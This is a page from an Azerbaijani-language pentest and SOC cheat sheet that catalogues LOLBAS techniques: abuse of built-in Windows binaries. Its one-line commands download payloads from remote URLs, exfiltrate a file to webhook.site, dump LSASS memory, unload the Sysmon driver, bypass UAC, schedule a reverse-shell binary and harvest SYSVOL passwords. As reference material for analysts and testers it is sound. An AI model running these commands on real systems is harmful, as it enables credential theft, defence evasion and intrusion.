Pentest və SOC Cheat Sheet
  • Reconnaissance
  • Post-Explotation
    • Linux Post-Explotation
      • Linux Local Enumeration
      • Linux Privilege Escalation
      • Dumping and cracking hashes on Linux
      • Linux Persistence
    • Windows Post-Explotation
      • Windows Local Enumeration
      • Windows Privilege Escalation
      • Windows Persistence
  • Network Services Pentesting
    • 21-Pentesting FTP
    • 22-Pentesting SSH
    • 23-Pentesting Telnet
    • 53-Pentesting DNS
    • 25,465,587-Pentesting SMTP
    • 110,995-Pentesting POP
    • 139,445-Pentesting SMB
    • 3306-Pentesting MySQL
    • 3389-Pentesting RDP
    • 1433-Pentesting MSSQL-Microsoft SQL Server
    • 389,636,3268,3269-Pentesting LDAP
  • Web Pentesting
    • Broken Access Control
      • Praktiki nümunə
    • OS Command Injection
      • Praktiki nümunə
    • SQL Injection
      • Praktiki nümunə
    • Cross-Site-Scripting (XSS)
      • Praktiki nümunə
    • File Upload
      • Praktiki nümunə
    • Directory Traversal və Path Traversal
      • Praktiki nümunə
    • CSRF
    • XXE
    • Clickjacking
      • Praktiki nümunə
    • SSRF
      • Praktiki nümunə
    • JWT (Json Web Token)
      • Praktiki nümunə
    • Local&Remote File İnclusion
      • Praktiki nümunə
      • Local File inclusion ilə reverse shell almaq
    • 401&403 Bypass
    • Login Bypass
    • Open Redirect
    • Unicode Injection
    • Security Misconfiguration
    • CRLF injection
    • LDAP Injection
    • Cookies Hacking
    • Cross site WebSocket hijacking (CSWSH)
    • SSTI (Server Side Template Injection)
    • CSTI (Client Side Template Injection)
    • XSLT Server Side Injection (Extensible Stylesheet Languaje Transformations)
    • Registration & Takeover Vulnerabilities
    • Regular expression Denial of Service - ReDoS
    • Reset/Forgotten Password Bypass
    • SAML Hücumları
    • Reverse Tab Nabbing
    • Web Tool - WFuzz
    • XPATH enjeksiyonu
    • Server-Side Includes (SSI) Injection
    • Edge Side Inclusion Injection (ESII)
    • Race Condition
    • PostMessage
    • Parameter Pollution
    • Cache Poisoning and Cache Deception
    • Captcha Bypass
  • AD Pentesting
    • Domain Enumeration
      • PowerView ilə enumeration
      • AD Module ilə enumeration
      • BloodHound ilə enumeration
        • On Site BloodHound
      • Using Adalanche
        • Remote adalanche
      • Useful Enumeration Tools
    • Local Privilege Escalation
      • Useful Local Priv Esc Tools
      • UAC Bypass
    • Lateral Movement
      • Powershell Remoting
      • Mimikatz
      • Remote Desktop Protocol
      • URL File Attacks
      • Useful Tools
    • Domain Privilege Escalation
      • Kerberoast
      • ASREPRoast
      • Password Spray Attack
      • Force Set SPN
      • Abusing Shadow Copies
      • List and Decrypt Stored Credentials using Mimikatz
      • Unconstrained Delegation
      • Constrained Delegation
      • Resource Based Constrained Delegation
      • DNSAdmins Abuse
      • Abusing Active Directory-Integraded DNS (ADIDNS) poisoning
      • Abusing Backup Operators Group
      • SID History Abuse
      • Active Directory Certificate Services
    • Domain Persistence
      • Golden Ticket Attack
      • Silver Ticket Attack
      • Skeleton Key Attack
      • DSRM Abuse
      • DCsync Attack
    • Cross Forest Attacks
      • Trust Tickets
      • Abuse MSSQL Servers
      • Breaking Forest Trusts
  • SOC - Cheat Sheet
    • SOC Nədir?
    • SOC Komponentləri Nələrdir?
    • SOC Checklist
    • SIEM
      • Splunk Qurulması və Konfiqurasiyası
    • IDS/IPS
    • Firewall
    • Firewall qurulması və konfiqurasiyası
    • EDR/XDR
    • SOAR
    • Windows Commands for SOC analysts
      • GUI Programs in Windows
      • Event Viewer
      • Task Scheduler
      • Group Policy Editor
      • Device Manager
      • Task Manager
      • Registry Manager
    • Linux Commands for SOC analysts
    • LOLBAS Apps and Commands
      • Apps and Commands
Powered by GitBook
On this page

Was this helpful?

  1. SOC - Cheat Sheet
  2. LOLBAS Apps and Commands

Apps and Commands

AddinUtil.exe

Execute

AddinUtil 'Addins.Store' faydalı yükünün mövcud olduğu kataloqdan icra edilir, AddinUtil 'Addins.Store' faydalı yükünü yerinə yetirəcək.

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinUtil.exe -AddinRoot:.

AppInstaller.exe

Download

AppInstaller.exe URI üçün standart işləyici tərəfindən yaradılıb, o, paketi URL-dən yükləməyə/quraşdırmağa cəhd edir.

start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw

Aspnet_Compiler.exe

AWL Bypass

Quraşdırma Provayderi və lazımi qovluq strukturu ilə C# kodunu yerinə yetirin.

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u

At.exe

Execute

Hər gün müəyyən bir vaxtda yerinə yetirmək üçün təkrarlanan tapşırıq yaradın.

C:\Windows\System32\at.exe 09:00 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\revshell.exe

Atbroker.exe

Execute

Qeydiyyatdan keçmiş Assistive Technology (AT) işə salın.

ATBroker.exe /start malware

Bash.exe

bash.exe-dən calc.exe-ni icra edir

bash.exe -c calc.exe

Bitsadmin.exe

Alternate data streams

bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1

CertOC.exe

Execute

certoc.exe -LoadDLL "C:\test\calc.dll"

CertReq.exe

Download

CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt

Certutil.exe

Download,Encode,Decode

certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
certutil -encode inputFileName encodedOutputFileName
certutil -decode encodedInputFileName decodedOutputFileName

Cmd.exe

Download,Upload

Müəyyən edilmiş faylı WebDAV serverindən hədəf fayla yükləyir.Müəyyən edilmiş faylı WebDAV serverinə yükləyir.

type \\webdav-server\folder\file.ext > C:\Path\file.ext
type C:\Path\file.ext > \\webdav-server\folder\file.ext

Cmdkey.exe

Credentials

cmdkey /list

Cmstp.exe

Execute

cmstp.exe /ni /s c:\cmstp\CorpVPN.inf

Colorcpl.exe

Copy

colorcpl file.txt

ConfigSecurityPolicy.exe

Upload,Download

ConfigSecurityPolicy.exe C:\Windows\System32\calc.exe https://webhook.site/xxxxxxxxx?encodedfile
ConfigSecurityPolicy.exe https://example.com/payload

Conhost.exe

Execute

conhost.exe calc.exe

Csc.exe

Compile

File.cs-də saxlanılan C# kodunu tərtib etmək və tərtib edilmiş versiyanı My.exe-yə çıxarmaq üçün CSC.EXE-dən istifadə edin.

csc.exe -out:My.exe File.cs
csc -target:library File.cs

DeviceCredentialDeployment.exe

Conceal

DeviceCredentialDeployment

Diskshadow.exe

Dump,Execute

Hazırlanmış disk kölgəsi skriptindən diskshadow.exe istifadə edərək əmrləri yerinə yetirin.

diskshadow.exe /s c:\test\diskshadow.txt
diskshadow> exec calc.exe

Eventvwr.exe

UAC Bypass

Başlanğıc zamanı eventvwr.exe, eventvwr.msc saxlanan konsol faylını açmaq üçün istifadə edilən mmc.exe-nin yeri üçün HKCU\Software\Classes\mscfile\shell\open\command reyestr dəyərini yoxlayır. Bu reyestr dəyərinə başqa ikili və ya skriptin yeri əlavə edilərsə, o, istifadəçiyə UAC sorğusu göstərilmədən yüksək bütövlükdə proses kimi icra olunacaq.

ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe

Findstr.exe

Credentials,Download

SYSVOL-da saxlanılan Qrup Siyasəti fayllarında saxlanılan parolu axtarın.

findstr /S /I cpassword \\sysvol\policies\*.xml

fltMC.exe

Tamper

Təhlükəsizlik agentləri tərəfindən istifadə edilən sürücünü yükdən çıxarır

fltMC.exe unload SysmonDrv

Ftp.exe

Execute

echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt

Msdt.exe

Execute,AWL bypass

msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE

Psr.exe

Reconnaissance

GUI yaratmadan istifadəçi ekranını yazın. Siz qeydi dayandırmaq və çıxış faylı yaratmaq üçün "psr.exe /stop" istifadə etməlisiniz.

psr.exe /start /output D:\test.zip /sc 1 /gui 0

Pester.bat

Execute

Pester.bat [/help|?|-?|/?] "$null; notepad"

Pubprn.vbs

Execute

pubprn.vbs 127.0.0.1 script:https://domain.com/folder/file.sct

devtunnel.exe

Download

8080 portunda yerli olaraq yerləşdirilən xidmət üçün yönləndirilmiş portun internetdə nümayiş etdirilməsinə icazə verilir.

devtunnel.exe host -p 8080

Wsl.exe

Execute,Download

wsl.exe -e /mnt/c/Windows/System32/calc.exe

Winword.exe

Download

Downloads payload from remote server

winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"

VSIISExeLauncher.exe

Execute

VSIISExeLauncher.exe -p [PATH_TO_BIN] -a "argument here"

Tracker.exe

Awl Bypass

Tracker.exe /d .\calc.dll /c C:\Windows\write.exe

Squirrel.exe

Download, Execute

squirrel.exe --download [url to package]
squirrel.exe --update [url to package]
squirrel.exe --updateRollback=[url to package]

SQLToolsPS.exe

Execute

Modul və ScriptBlock Girişi olmadan SQL Server PowerShell mini konsolunu işə salın.

SQLToolsPS.exe -noprofile -command Start-Process calc.exe

Sqldumper.exe

Dump

sqldumper.exe 464 0 0x0110

Remote.exe

Execute

Powershell-i remote.exe-nin uşaq prosesi kimi yaradır

Remote.exe /s "powershell.exe" anythinghere

ProtocolHandler.exe

Uzaq serverdən yükü endirir

ProtocolHandler.exe https://example.com/payload

OpenConsole.exe

Execte

OpenConsole.exe calc

Mspub.exe

Download

mspub.exe https://example.com/payload

Msdeploy.exe

Execute,AWL Bypass

msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat"

Mftrace.exe

Execute

Mftrace.exe cmd.exe

Excel.exe

Download

Excel.exe http://192.168.1.10/TeamsAddinLoader.dll

DumpMinitool.exe

Dump

DumpMinitool.exe --file c:\users\mr.d0x\dump.txt --processId 1132 --dumpType Full

Dump64.exe

Dump

Creates a memory dump of the LSASS process.

dump64.exe <pid> out.dmp

Dotnet.exe

Execute

dotnet.exe [PATH_TO_DLL]

Devinit.exe

MSI faylını C:\Windows\Installer-ə yükləyir və sonra quraşdırır.

devinit.exe run -t msi-install -i https://example.com/out.msi

csi.exe

Execute

csi.exe file

Createdump.exe

Dump

createdump.exe -n -f dump.dmp [PID]

Comsvcs.dll

Dump

rundll32 C:\windows\system32\comsvcs.dll MiniDump [LSASS_PID] dump.bin full

Shdocvw.dll

Execute

rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url"

Mshtml.dll

Execute

rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta"

code.exe

Websockets vasitəsilə global.rel.tunnels.api.visualstudio.com üzərindən əks PowerShell bağlantısını işə salır; əmr

code.exe tunnel --accept-server-license-terms --name "tunnel-name"

Wsreset.exe

UAC Bypass

wsreset.exe

Wmic.exe

Alternate DATA Streams

wmic.exe process call create "c:\ads\file.txt:program.exe"

Unregmp2.exe

Execute

rmdir %temp%\lolbin /s /q 2>nul & mkdir "%temp%\lolbin\Windows Media Player" & copy C:\Windows\System32\calc.exe "%temp%\lolbin\Windows Media Player\wmpnscfg.exe" >nul && cmd /V /C "set "ProgramW6432=%temp%\lolbin" && unregmp2.exe /HideWMP"

ssh.exe

Execute

ssh localhost calc.exe

Sc.exe

sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice

Rundll32.exe

Execute

rundll32.exe AllTheThingsx64,EntryPoint
PreviousLOLBAS Apps and Commands

Last updated 1 year ago

Was this helpful?